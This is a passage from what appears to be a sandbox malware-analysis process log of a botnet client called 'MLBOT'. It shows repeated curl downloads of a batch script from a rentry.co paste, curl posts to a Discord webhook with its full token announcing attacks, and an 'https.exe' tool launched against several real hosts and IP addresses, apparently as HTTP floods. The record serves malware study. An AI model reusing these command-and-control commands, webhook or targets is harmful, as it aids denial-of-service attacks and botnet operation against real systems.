      Timeout /t 5 /nobreak
      4⤵
      PID:3052
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4704
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:440
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4044
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2352
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2996
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2184
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1344
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4400
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2904
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4240
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3544
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1628
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4796
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1700
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4864
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3756
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:548
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3856
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3212
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2892
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4024
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https https://file.cunhua.today 17000 50 {}\", \"description\": \" Fri 08/18/2023-50 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:2544
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe https://file.cunhua.today 50
      4⤵
      Executes dropped EXE
      PID:1272
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3460
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4864
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1480
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4780
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:5008
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4944
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:436
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2064
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3236
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://fedcc.online 17000 60 {}\", \"description\": \" Fri 08/18/2023-60 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:3416
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://fedcc.online 60
      4⤵
      Executes dropped EXE
      PID:2544
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1704
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2420
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4972
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1712
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1780
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1272
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3744
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5084
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1700
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://fedcc.online 17000 60 {}\", \"description\": \" Fri 08/18/2023-60 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:1320
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://fedcc.online 60
      4⤵
      Executes dropped EXE
      PID:3908
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3016
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3532
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4968
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2748
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4052
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4476
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4084
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4964
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1828
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://51.15.25.108 17000 60 {}\", \"description\": \" Fri 08/18/2023-60 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:3600
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://51.15.25.108 60
      4⤵
      Executes dropped EXE
      PID:2992
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4316
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4068
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2960
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4916
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1512
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3832
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:612
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2456
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:800
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1696
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2448
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://88.198.48.45 17000 60 {}\", \"description\": \" Fri 08/18/2023-60 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:756
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://88.198.48.45 60
      4⤵
      Executes dropped EXE
      PID:1416
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1248
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1448
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1536
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3240
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1268
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3252
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4836
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2032
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3852
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4208
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2336
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1548
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1532
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:328
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:316
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4532
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1604
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5104
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4132
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1016
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3176
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2012
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4828
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3940
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4796
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://88.198.48.45 20000 100 {}\", \"description\": \" Fri 08/18/2023-100 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:4976
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://88.198.48.45 100
      4⤵
      Executes dropped EXE
      PID:3084
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2900
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4220
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1688
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4012
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1584
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3316
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4864
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4652
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2176
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4120
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2216
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4304
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1164
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4672
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1908
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4176
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3236
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1108
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4988
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1436
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4884
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4484
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3532
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4040
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3156
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:748
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4816
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3864
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4740
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1156
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4612
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4084
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4692
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4964
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2352
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2260
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1888
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1344
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2280
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1104
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2108
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3068
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3048
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3088
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4552
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:728
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2544
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3880
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3208
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1968
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1948
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1016
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3040
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2716
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3496
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4308
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1780
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4108
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2740
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4324
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1992
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1096
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2652
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:732
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4744
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3860
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1828
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4812
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1560
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1556
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1160
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2184
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3788
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1364
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1964
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3700
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1576
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1236
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4500
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4440
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4860
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:632
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:916
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https http://88.198.59.166/cc 26000 100 {}\", \"description\": \" Fri 08/18/2023-100 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:3352
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe http://88.198.59.166/cc 100
      4⤵
      Executes dropped EXE
      PID:4392
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:5008
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1108
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4856
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:828
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4376
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4020
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3736
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:452
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4052
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1924
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:5068
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1416
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2160
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1656
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4684
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1248
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1588
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1472
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:488
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1232
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1268
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4420
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4032
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3908
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4360
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2776
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2108
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:960
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3048
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:852
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1856
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1604
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4400
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4132
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4072
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:416
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1948
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4972
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3040
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:372
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4300
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4796
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1920
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2064
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2892
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2340
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:644
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4264
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1496
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3100
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1832
  - - C:\Windows\system32\timeout.exe
